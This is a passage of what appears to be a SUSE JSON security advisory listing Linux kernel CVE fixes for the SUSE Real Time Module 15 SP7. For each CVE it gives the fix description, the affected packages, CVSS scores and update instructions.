"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71097"
},
{
"cve": "CVE-2025-71098",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71098"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_gre: make ip6gre_header() robust\n\nOver the years, syzbot found many ways to crash the kernel\nin ip6gre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ip6gre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0\n------------[ cut here ]------------\n kernel BUG at net/core/skbuff.c:213 !\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n neigh_output include/net/neighbour.h:556 [inline]\n ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136\n __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]\n ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71098",
"url": "https://www.suse.com/security/cve/CVE-2025-71098"
},
{
"category": "external",
"summary": "SUSE Bug 1256591 for CVE-2025-71098",
"url": "https://bugzilla.suse.com/1256591"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71098"
},
{
"cve": "CVE-2025-71099",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71099"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()\n\nIn xe_oa_add_config_ioctl(), we accessed oa_config-\u003eid after dropping\nmetrics_lock. Since this lock protects the lifetime of oa_config, an\nattacker could guess the id and call xe_oa_remove_config_ioctl() with\nperfect timing, freeing oa_config before we dereference it, leading to\na potential use-after-free.\n\nFix this by caching the id in a local variable while holding the lock.\n\nv2: (Matt A)\n- Dropped mutex_unlock(\u0026oa-\u003emetrics_lock) ordering change from\n xe_oa_remove_config_ioctl()\n\n(cherry picked from commit 28aeaed130e8e587fd1b73b6d66ca41ccc5a1a31)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71099",
"url": "https://www.suse.com/security/cve/CVE-2025-71099"
},
{
"category": "external",
"summary": "SUSE Bug 1256592 for CVE-2025-71099",
"url": "https://bugzilla.suse.com/1256592"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71099"
},
{
"cve": "CVE-2025-71100",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71100"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()\n\nTID getting from ieee80211_get_tid() might be out of range of array size\nof sta_entry-\u003etids[], so check TID is less than MAX_TID_COUNT. Othwerwise,\nUBSAN warn:\n\n UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30\n index 10 is out of range for type \u0027rtl_tid_data [9]\u0027",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71100",
"url": "https://www.suse.com/security/cve/CVE-2025-71100"
},
{
"category": "external",
"summary": "SUSE Bug 1256593 for CVE-2025-71100",
"url": "https://bugzilla.suse.com/1256593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71100"
},
{
"cve": "CVE-2025-71101",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71101"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing\n\nThe hp_populate_*_elements_from_package() functions in the hp-bioscfg\ndriver contain out-of-bounds array access vulnerabilities.\n\nThese functions parse ACPI packages into internal data structures using\na for loop with index variable \u0027elem\u0027 that iterates through\nenum_obj/integer_obj/order_obj/password_obj/string_obj arrays.\n\nWhen processing multi-element fields like PREREQUISITES and\nENUM_POSSIBLE_VALUES, these functions read multiple consecutive array\nelements using expressions like \u0027enum_obj[elem + reqs]\u0027 and\n\u0027enum_obj[elem + pos_values]\u0027 within nested loops.\n\nThe bug is that the bounds check only validated elem, but did not consider\nthe additional offset when accessing elem + reqs or elem + pos_values.\n\nThe fix changes the bounds check to validate the actual accessed index.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71101",
"url": "https://www.suse.com/security/cve/CVE-2025-71101"
},
{
"category": "external",
"summary": "SUSE Bug 1256594 for CVE-2025-71101",
"url": "https://bugzilla.suse.com/1256594"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71101"
},
{
"cve": "CVE-2025-71108",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71108"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: Handle incorrect num_connectors capability\n\nThe UCSI spec states that the num_connectors field is 7 bits, and the\n8th bit is reserved and should be set to zero.\nSome buggy FW has been known to set this bit, and it can lead to a\nsystem not booting.\nFlag that the FW is not behaving correctly, and auto-fix the value\nso that the system boots correctly.\n\nFound on Lenovo P1 G8 during Linux enablement program. The FW will\nbe fixed, but seemed worth addressing in case it hit platforms that\naren\u0027t officially Linux supported.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71108",
"url": "https://www.suse.com/security/cve/CVE-2025-71108"
},
{
"category": "external",
"summary": "SUSE Bug 1256774 for CVE-2025-71108",
"url": "https://bugzilla.suse.com/1256774"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71108"
},
{
"cve": "CVE-2025-71111",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71111"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (w83791d) Convert macros to functions to avoid TOCTOU\n\nThe macro FAN_FROM_REG evaluates its arguments multiple times. When used\nin lockless contexts involving shared driver data, this leads to\nTime-of-Check to Time-of-Use (TOCTOU) race conditions, potentially\ncausing divide-by-zero errors.\n\nConvert the macro to a static function. This guarantees that arguments\nare evaluated only once (pass-by-value), preventing the race\nconditions.\n\nAdditionally, in store_fan_div, move the calculation of the minimum\nlimit inside the update lock. This ensures that the read-modify-write\nsequence operates on consistent data.\n\nAdhere to the principle of minimal changes by only converting macros\nthat evaluate arguments multiple times and are used in lockless\ncontexts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71111",
"url": "https://www.suse.com/security/cve/CVE-2025-71111"
},
{
"category": "external",
"summary": "SUSE Bug 1256728 for CVE-2025-71111",
"url": "https://bugzilla.suse.com/1256728"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
